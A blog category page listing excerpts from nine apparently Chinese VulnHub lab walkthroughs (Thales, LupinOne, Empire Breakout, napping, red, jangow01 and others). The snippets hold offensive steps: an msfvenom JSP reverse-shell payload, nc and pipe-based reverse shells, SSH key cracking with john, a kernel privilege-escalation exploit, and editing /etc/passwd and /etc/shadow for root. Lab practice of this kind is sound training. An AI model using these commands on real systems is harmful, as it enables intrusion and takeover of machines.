vulnhub
文章平均质量分 76
Genarior
这个作者很懒,什么都没留下…
展开
-
vulnhub靶场9:Thales
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.50.190 LPORT=4444 -f war -o upfile.war //创建反弹shell payload。12、查看/home/thales/.ssh目录,发现私钥,拷贝下,使用ssh2john转下,并使用john破解。export TERM=xterm-256color //设置终端环境变量。10、查看/home/thales/note.txt,提示有个shell。原创 2023-06-24 22:36:41 · 196 阅读 · 1 评论 -
vulnhub靶场8:LupinOne
3、ffuf -u http://192.168.52.113/~secret/.FUZZ -w /usr/share/dirbuster/wordlist/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,.html -mc 200 -s 可以指定多个后缀。扫描到mysecret.txt,访问http://192.168.52.113/~secret/.mysecret.txt。12、cat user.txt 得到第一个key.原创 2023-06-14 22:20:48 · 170 阅读 · 0 评论 -
vulnhub靶场7:Empire Breakout
9、查找具有pass字符的文件,find / -name "*pass*" 2>/dev/null 发现目标文件/var/backup/.old_pass.bak,使用tar将该文件拷贝到主目录。10、查看.old_pass.bak, 得到root密码,反弹shell,切换到root得到第二个flag。3、访问80,查看网页源码,发现brainfuck/ook加密数据,使用在线解密,得到一串密码。8、进一步查看tar文件特权 getcap ./tar ,发现tar文件具有全局读写权限。原创 2023-05-30 18:19:33 · 158 阅读 · 0 评论 -
vulnhub靶场6:napping
8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件 ,发现了一个query.py。6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码。10、获得反弹shell,查看sudo可执行命令,可以无需密码root权限执行vim。使用sudo vim 修改/etc/passwd文件添加用户。13、使用sudo vim修改/etc/shadow文件。7、ssh登录,查看权限。原创 2023-05-16 18:14:14 · 202 阅读 · 0 评论 -
vulnhub靶场5:red
17、赋权后,执行该工具,找到了后面文件,该源码文件会被定时编译,并执行,发现后面程序,在/var/www/wordpress/.git/目录下,该文件执行具有root权限。12、发现可以使用ippsec账户,执行/usr/bin/time命令,于是切换到ippsec用户,并反弹shell,在ippsec用户反馈的shell不会被定时清除。8、由于是php,所以读取配置文件,wp-config.php,得到如下信息,使用ssh登录,无法登录,由于前面提到hashcat,考虑通过碰撞进行爆破。原创 2023-05-04 18:52:54 · 155 阅读 · 0 评论 -
vulnhub靶场4:jangow01
13、通过蚁剑上传,编译,并执行。提权成功,cat /root/proof.txt。12、通过searchsploit查看是否有可以提权的点,找到45010.c。11、查看系统版本,ubuntu 16.04 内核版本4.4.0-31。3、开放21、80端口,访问http看看,发现命令执行。8、使用蚁剑写入管道方式的反弹shell脚本。1、当nc -e被裁剪,使用管道反弹shell。7、nc没有-e选项,无法反弹shell。6、蚁剑连接 ,找到几个密码。9、443端口成功反弹。3、查看系统提权exp。原创 2023-04-24 21:14:57 · 171 阅读 · 0 评论 -
vulnhub靶场3:The Planets Earth
vulnhub靶场练习原创 2023-03-31 09:59:09 · 175 阅读 · 0 评论 -
vulnhub靶场2:Web machine(N7)
vulnhub靶场2:Webmachine(N7)原创 2023-03-13 23:02:31 · 386 阅读 · 0 评论 -
vulnhub靶场1:matrix-breakout-2-morpheus
vulnhub - matrix-breakout-2-morpheus靶场记录原创 2023-02-22 22:48:07 · 667 阅读 · 1 评论